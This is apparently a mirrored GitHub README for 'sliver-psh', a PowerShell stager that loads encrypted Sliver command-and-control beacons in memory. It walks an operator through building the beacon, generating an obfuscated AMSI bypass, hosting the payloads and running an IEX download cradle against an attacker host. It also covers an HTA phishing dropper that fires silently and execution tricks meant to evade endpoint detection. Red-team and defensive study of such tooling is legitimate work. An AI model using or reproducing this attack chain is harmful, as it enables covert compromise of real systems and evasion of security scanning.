2026-06-30 05:31:43 +01:00
2026-06-30 05:29:20 +01:00
2026-06-30 05:31:43 +01:00
2026-06-30 05:29:20 +01:00
2026-06-30 05:29:20 +01:00
2026-06-30 05:29:20 +01:00
2026-06-30 05:30:37 +01:00
2026-06-30 05:29:20 +01:00

sliver-psh

PowerShell stager for Sliver beacons. Downloads an AES-256-CBC encrypted beacon over HTTP, decrypts it in memory, and executes it via a function pointer delegate without touching disk. Includes an AMSI patch to neutralize the scanner in the PowerShell process before the payload runs.

The HTA delivery method documented here is one option. The stager itself works with any delivery that can run a PowerShell download cradle: macro, scheduled task, WinRM, living-off-the-land, whatever fits the engagement.

Flow

1. Generate the beacon in Sliver

profiles new --format shellcode --mtls LHOST:443 --skip-symbols beacon-profile
generate --save beacon.bin

Specify the port explicitly in --mtls. Omitting it defaults to 8888, not 443.

2. Encrypt the beacon

python3 encrypt.py beacon.bin beacon_enc.bin

Prints the key and IV. Copy both into stager.ps1 under the config block.

3. Generate a fresh AMSI patch

python3 gen_amsi.py --url http://LHOST/stager.ps1 > amsi.ps1

Each run produces a new random XOR key, so the output differs every time. The --url flag appends the IEX download cradle for stager.ps1 at the end.

4. Update config values

In stager.ps1, set $LHOST and paste the key and IV from step 2.

In delivery.hta, set LHOST if using HTA delivery.

5. Serve the files

sudo python3 -m http.server 80

The target needs to reach beacon_enc.bin, stager.ps1, and amsi.ps1 at the same host.

6. Trigger execution on the target

The entry point is amsi.ps1. Deliver it however fits the engagement:

IEX(New-Object Net.WebClient).DownloadString('http://LHOST/amsi.ps1')

Or via the included HTA dropper, which wraps that cradle in a VBScript Window_onLoad handler so it fires the moment mshta.exe opens the file.

7. Start the mTLS listener in Sliver

mtls --lhost LHOST --lport 443

HTA delivery

delivery.hta is a phishing delivery vector. Send the target a link to http://LHOST/delivery.hta and mshta.exe will open it, fire the PowerShell cradle silently, and close the window. Update LHOST in the file before use.

Files

File Purpose
delivery.hta Optional HTA dropper, update LHOST
amsi.ps1 Generated AMSI patch, do not commit
stager.ps1 Stager template, update LHOST, key, IV
encrypt.py Encrypts a payload, prints key and IV
gen_amsi.py Generates a fresh obfuscated AMSI patch

*.bin files and amsi.ps1 are gitignored. Regenerate both per engagement.

Notes

The AMSI patch writes mov eax, 0x80070057; ret over AmsiScanBuffer in the current process, making it return E_INVALIDARG and skip the scan. The entire P/Invoke definition is XOR obfuscated so no plaintext signatures appear in the script.

Execution uses Marshal.GetDelegateForFunctionPointer rather than CreateThread, which avoids the thread creation event and keeps execution on the calling thread.

Memory is allocated RW, the beacon is copied in, then flipped to RX before execution. No RWX region is ever created.

S
Description
Automated archival mirror of github.com/Chaelsoo/sliver-psh
Readme
29 KiB
Languages
PowerShell 54.5%
Python 38.9%
HTML 6.6%